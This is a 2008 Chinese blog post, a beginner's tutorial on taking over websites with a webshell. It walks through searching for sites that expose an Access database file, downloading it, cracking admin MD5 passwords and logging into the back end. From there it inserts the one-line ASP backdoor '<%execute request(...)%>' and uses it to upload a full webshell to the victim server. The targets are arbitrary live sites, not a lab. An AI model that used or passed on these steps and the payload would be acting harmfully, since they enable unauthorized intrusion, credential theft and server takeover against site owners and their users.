教菜鸟拿webshell - 朝气
当前位置: 首页 > 学习天地 > 正文

教菜鸟拿webshell

教菜鸟拿webshell教菜鸟快速拿下WEBSHELL工具网上都有的: 挖掘机 v1.1 辅臣数据游览器 一名话木马 ASP马 首先打开挖掘机 v1.1, 选择“添加后缀”加入一个新的后缀“/database/userdata.mdb”并勾选,其他后缀全都不要勾 关键词填“inurl:xxlr1.asp?ID=” 开始 看下方的检测结果里一会就会出了很多数据库地址 随便选取一个数据库地址,双击就会自动下载,我们保存到桌面,用辅臣打开他 找到表名“user1”双击打开 “user”为用户名 “pas”为密码 我们可以看到密码是用MD5加密过的,可以到http://www.cmd5.com解密(如果查询结果为“NotFound”说明没有记录,需要换一个用户) 获得密码之后就可以去网站登陆了 登陆之后选择“管理网站”,进入后台 如果前台没有的话就用明小子或是啊D扫一下后台地址 后台拿到了,接下来就是拿shell了 随便选取一个项目,选择“修改”,把原内容清掉,插入一句话木马“<%execute request(“value”)%>”(如果没有项目的话直接填在下方的 “增加项目”然后添加调查) 调查的数据库路径是“dc/webdc.asp”把这个加入到网站主页的路径后就是完整的路径,打开采飞扬 – 网站小助手,把完整的路径输入,然后 按“go…”就能使用一句话木马了,观察给出的程序路径,应该是***\dc\help.asp(***为前面的路径,因为每个站不一样我就不举例,省得 误会) 让你“输入保存的路径”,你就填***\a.asp(这里的***就是上面的***) 接着找到火狐NEW WEBSHELL 8.0,右键它,选择“用记事本打开”,选取全部内容,复制,并粘贴到刚才让你“输入文件的内容”后面的框中 ,然后按“保存”就ok了 在浏览器中打开http://(这个站的地址)/a.asp,输入密码“admin”(火狐NEW WEBSHELL 8.0的密码,用其他webshell的请根据实际填相应 的密码) 这样我们就拿下了一个WEBSHELL 是很容易的,工具网上好多的,自己找下,不明白问我或是找相应教程

转载请注明转自朝气 ,本文链接: http://www.gtsow.com/artices/4.html

该日志由 逝魂 于2008年04月27日发表在学习天地分类下,
您还可以在保留本文地址和作者的前提下转载到您的网站或空间。

报歉!评论已关闭.